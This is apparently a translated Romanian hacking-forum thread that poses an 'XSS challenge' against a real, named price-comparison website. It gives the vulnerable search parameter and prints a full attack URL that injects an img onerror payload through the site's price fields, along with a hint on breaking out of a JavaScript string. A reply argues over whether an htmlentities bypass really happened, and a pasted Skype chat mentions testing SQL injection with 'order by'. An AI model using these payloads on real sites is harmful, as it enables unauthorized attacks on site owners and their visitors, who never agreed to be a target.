Goke

HARD XSS CHALLENGE


http://www.compari.ro/CategorySearch.php?st=

The vector must be exactly after ?st=

like

http://www.compari.ro/CategorySearch.php?st=<script>alert(1)</script>

and not

http://www.compari.ro/CategorySearch.php?st=graficard&noredirect=&minprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&maxprice=%22%3E%3Cimg+src%3Dx+onerror%3Dconfirm%281%29%3E&orderby=9

Done by someone... (I'm not giving names)

http://i.imgur.com/stLQEdk.png

I DIDN'T WANT TO GIVE A HINT... BECAUSE THEN EVERYONE WOULD CATCH ON... I THINK I'LL REGRET IT, BUT ANYWAY :))

HINT=" + "

Edited by Goke

I'm sorry you deleted the old topic, in which you had failed and said the parameter is st, but you had done the XSS on the compare price field.

How did I figure it out?

1. If you put any vector into search, nothing shows up, no results at all, whereas you got results that were unrelated.

2. You had censored the compare price field.

3. You had the print screen the same as mine. (meaning it was in the same place)


//Knowing that bypassing htmlentities is an impossible thing, look, here it is not impossible ^_^//

A bypass of htmlentities can be done in some ideal cases. In your case the executed vector is not the one displayed through htmlentities; you didn't do any bypass, rest easy.


[1:06:14 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: can you help me with a host?

[1:06:18 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: free

[1:06:22 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: because I have one from hostinger

[1:06:24 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: and

[1:06:28 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: I don't like it,,

[1:06:35 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: it used to work

[1:06:50 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: I made myself a database connection script vulnerable to sqli

[1:06:59 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: but now when I try order by

[1:07:01 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: it doesn't work anymore

[1:07:08 PM] 01000010 01101000 01100001 01111000 01111000 01101111 01110010: and I think it's because of the host

Yeah, something like that on Skype.
